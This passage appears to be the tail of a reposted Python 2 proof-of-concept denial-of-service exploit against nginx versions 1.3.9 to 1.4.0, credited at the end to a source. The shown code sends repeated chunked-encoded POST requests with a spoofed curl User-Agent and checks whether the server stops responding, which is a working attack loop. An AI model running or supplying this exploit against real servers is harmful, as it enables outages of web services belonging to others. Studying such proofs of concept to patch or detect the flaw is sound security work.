"/mertsarica.php" con.putrequest('POST', url) con.putheader('User-Agent', "curl/7.30.0") con.putheader('Accept', "*/*") con.putheader('Transfer-Encoding', 'chunked') con.putheader('Content-Type', "application/x-www-form-urlencoded") con.endheaders() con.send(chunk(body, chunk_size[:len(chunk_size)])) except: print "Connection error!" sys.exit(1) try: resp = con.getresponse() print(resp.status, resp.reason) except: print " [*] Knock knock, is anybody there ? (" + str(packet) + "/5)" packet = packet + 1 con.close() print "[+] Done!" Sursa: nginx 1.3.9-1.4.0 DoS PoC